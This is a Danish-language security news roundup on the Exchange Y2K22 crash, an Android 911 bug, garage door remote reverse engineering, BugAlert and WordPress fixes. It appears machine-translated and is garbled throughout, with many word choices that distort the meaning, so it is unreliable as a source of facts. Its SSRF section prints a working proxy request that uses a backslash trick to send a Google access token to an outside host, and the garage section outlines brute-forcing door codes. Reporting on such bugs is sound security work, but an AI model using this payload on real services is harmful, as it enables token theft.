Hvis du havde så uheldige at køre en Microsoft Exchange Server denne sidste uge, så du ikke kravet mig at fortælle dig om Y2K22 problem . Til fangst resten af os op, når udveksling forsøgt at hente den allerførste malware definitioner opdatering af 2022 versionsnummeret af de nye definitioner udløste en ulykke i malware afsløring motor. Datoen er repræsenteret som strengen 2201010001, hvor de allerførste to cifre repræsenterer året. Denne streng bliver konverteret til en underskrevet lang heltal, som maxes ud på 2,147,483,647. Det hele tal overløb, samt resultatet er udefineret adfærd, Crash motoren. Serveren standser arbejdet sikkert, ikke behandler nogen form for meddelelser uden en fungerende malware motor, hvilket indebærer, at ingen e-mail kommer igennem. glade nye år!

Android 911 Denial of Service

Opkald 911 til alarmcentralen er ganske meget den værste tid for et program bug at manifestere sig. Google har netop fast sådan en fejl i januar Android opdateringen. Det er en af disse mærkelige utilsigtede app interaktioner – i denne situation Microsoft hold udløser Android bug. Hvis holdene app er installeret, men ingen konto er logget ind, hold producerer samt registre en ny PhoneAccount punkt på hver lancering. Dette virker som det burde være sjældne, men hold på Android er ligeledes berygtet for at logge ud den enkelte spontant. Når du ringer 911, Android kører en rutine til at identificere, hvilke PhoneAccount bør udnyttes til stien opkaldet, samt løser bånd ved at sammenligne hashes. Denne sammenligning er bare en naiv subtraktion, hvilket indebærer, at der er en 50% mulighed i at få en ugunstig resultat. Det var uventet, hvilket fører til styrtet.

Garageporte revers Engineering

Reverse engineering en 30-årig trådløse tilladelse kan ikke være den mest interesse sensationsprægede feat, men i nogle tilfælde rejsen er sin egen belønning. [Maxwell Dulin] bringer os historien, såvel som denne rejse er absolut værd. Det grundlæggende i dette hack er sikkert stadig levedygtige, startende med at tage et kig på hardwaren. Garageporten er synkroniseret til garagen døråbner ved at holde en trykknap på modtageren under afsendelse af en kode. inde åbneren, der er ni dip switches, hver med tre positioner. Hvad laver de? Han trak sin pålidelig SDR at få webtrafik samt forsøge at afkode signalerne. Inspectrum samt GNU Radio var helte her, at give indsigt i denne let auth ordning. Den sidste tanke på denne faktiske garageport? Du kan brute force et ukendt kode ved at sende alle mulige combo, samt det tager kun 104 minutter.

BugAlert

Hvis du er en sysadmin, du forstår, at nogle spørgsmål telefonopkald til øjeblikkelig handling. Hvis du kørte Java-servere, den Log4J sårbarhed var en afslutte test af din reaktion protokol. tiden mellem offentliggørelse samt når du hørt om det, kan have været tilstrækkelig til at modregne katastrofe. Mens der er flere fejl Reporting Services samt rammer, intet hellere passer denne niche udnytte tilfælde: du får besked så hurtigt som muligt, at dit hår virkelig kan være i brand. At ubesatte niche aflyttet [Matt Sullivan], som har afsløret et nyt projekt, Bug Alert. Det hele er open source, så du kan holde din egen eksempel hvis du virkelig vil. Du kan vælge at få et tweet, tekst, eller endda telefonopkald. Dette har den potentielle at være et nyttigt redskab, tage et kig!

Jeg føler, at jeg krav om at gøre Bug Alert sæt fra en bestemt mærkelig Al sang …

Den zombie SSRF

[David Schütz] ledte efter obskure Google API’er, samt fundet jobs.googleapis.com, som du kan demo dig selv. At demo er interessant, da det ikke er en helt konkretiseret-out service, men taler til den ægte back-end. Anmodningerne gå med en proxy, cxl-services.appspot.com, som håndterer det trin godkendelse for demo side. Hvis han kunne modregne en server-side anmodning forfalskning (SSRF), kan han være i stand til at komme på de godkendte ansøgninger, samt måske teknik proxy til at sende webtrafik på hans vegne. URL parsing er hårdt. Teknikken, der fungerede? En omvendt skråstreg i url. get /proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/ HTTP / 1.1

Med en gevinst adgang til token i hånden, [David] startede grundigt kontrol af andre Google API’er til at se, hvad denne token givet ham adgang til at. Han giver den kautionsrammen vi har dækket før, være forsigtig, præcis hvor langt du skubbe. Han kunne have rapporteret fejlen bedst væk, men ønskede at kontrollere, at han virkelig havde en online-gevinst adgang til token. Efter bekræftelse af token hjalp tjekket ud adgang, vendte han sig i konstateringen, samt nettes en særdeles god $ 3133,70, foruden en ekstra $ 1000 for en stor rapport samt den forsigtige kig på lateral bevægelse. Det er alt, der er til det, ikke? Nix. lige før deadline på 90 dage afsløring gik, [David] fundet en reparation bypass. suppleng enhver form for tekst mellem backslash såvel som @ var tilstrækkelig til at bryde den. En yderligere $ 3133.70. Bare for sjov, forsøgte han de gamle webadresser, der ikke skulle være i brug efter filmen. Yep, han opdagede endnu en sikkerheds- og sikkerhedstoken, såvel som nettede $ 3133.70. Denne Zombie SSRF er stadig ikke død, som det fremgår af Twitter:

WordPress Update.

Hvis du ikke har indstillet din WordPress-forekomst til at opdatere automatisk, er det på tide at inspicere for den nyeste version. Der er fire potentielt skadelige problemer her, selvom detaljerne er knappe på dette tidspunkt. Meget første op er en sårbarhed på tværs af stedet i udgivne snegle, den del af webadressen, der matcher udgivelsesnavnet. Det andet problem, der diskuteres, er elementindsprøjtning i nogle multisite konfigurationer. De sidste to sårbarheder er SQL-injektioner, bestemt fortjener det “hvilket år er det?” meme.